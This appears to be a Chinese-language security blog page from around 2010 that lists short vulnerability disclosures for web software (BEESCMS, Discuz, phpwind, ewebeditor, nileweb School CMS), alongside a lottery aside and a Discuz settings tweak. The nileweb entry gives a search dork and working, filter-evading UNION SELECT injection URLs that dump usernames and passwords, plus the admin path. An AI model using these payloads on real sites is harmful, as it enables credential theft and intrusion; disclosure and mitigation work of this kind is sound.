好运期彩 期期精彩

 

闲着没事，哥也学着研究下彩票。希望有朝一日也能中个啥玩意来着。

双色球预测 、3D预测 、3D字谜

查看更多...

Discuz! 7.0 [media] 自动播放

修改打开 include 目录内 discuzcode.func.php 文件

约 279 行 将 $autostart = 0; 改为 $autostart = 1;

查看更多...

中国黑客元老龚蔚(goodwell) 9月推自律公约

收听地址
http://url.cn/2efz8X

查看更多...

发布日期：2010-10.25
发布作者：子仪

影响版本：BEESCMS v1.1.0
官方地址：http://www.beescms.com

漏洞类型：SQL注入、XSS
漏洞描述：BEES企业网站管理系统（以下称BEES）是一个基于PHP+Mysql架构的企业网站管理系统。BEES 采用模块化方式开发，功能强大灵活易于扩展，并且完全开放源代码，多种语言分站，为企业网站建设和外贸提供解决方案。

查看更多...

http://www.hackline.net/a/course/jbrq/2010/0930/5952.html
discuz 6.x/7.x/x1通杀普通用户提升管理漏洞

早在几日前就发布出dz 0day的消息，从动画可以看出是利用普通用户提升至管理员。影响范围从discuz 6.x/7.x到x1。目前DZ官方还未给出新的修补方案！

为了您的论坛安全，本人建议先修改管理后台页面或者限制IP登录。

1、在论坛根目录把admincp.php修改成新的文件名。

2、进入后台，全局--注册与访问--访问控制 添加允许访问管理中心的 IP 列表（dz 7.x有这个选项）



仅供参考！

黑白前线--过客献上！

发布日期：2010-10.04
发布作者：oldjun

影响版本：phpwind
官方地址：phpwind

漏洞类型：注入、上传漏洞
漏洞描述：上传漏洞现在很难会出现的，更别说强大的pw了，所以很多朋友是不是认为我这个标题唬人了？不过还确实是上传漏洞，不过呢，这个漏洞的利用需要两个条件，所以说其实很鸡肋，但之前还是蛮好用的，只要满足条件，屡试不爽的。好了，先说条件：
1.必须存在注入，可以注入出$db_siteid，因为前面那里发布的注入（以及其他某些地方的注入），可以轻松得到；
2.必须是IIS6，这个是致命的鸡肋点，漏洞利用的是IIS6的文件解析漏洞（其实不用想也知道，无论dz、pw或者其他cms不会有允许上传php之类后缀文件的）。

查看更多...

发布日期：2010-10.03
发布作者：Mr.MaGMA

官方地址：www.nileweb.com

漏洞类型：SQL注入

漏洞描述：nileweb School CMS 程序index.php参数过滤不严存在注入漏洞。

D0rk : inurl:index.php?action=cms/
 

[+]example :localhost/index.php?action=cms/showpaget&pageid=-21+/*!uniOn*/+select+1,2,3,4,5
[+] localhost/index.php?action=cms/showpaget&pageid=-21+/*!uniOn*/+select+1,convert(grOup_cOncat(username,0x3a,password) using latin1),3,4,5+frOm+users--

[+] IF NOT OK :
[+] localhost/index.php?action=cms/showpaget&pageid=-21+/*!uniOn*/+select+1,convert(grOup_cOncat(username,0x3a,password) using latin1),3,4,5,6+frOm+users--
[+] adminpanel : localhost/admin.php

 

发布日期：2010-09.24
发布作者：菜菜铅笔
影响版本：ewebeditor 5.5 - 6.0
官方地址：www.ewebeditor.net
漏洞类型：上传漏洞

查看更多...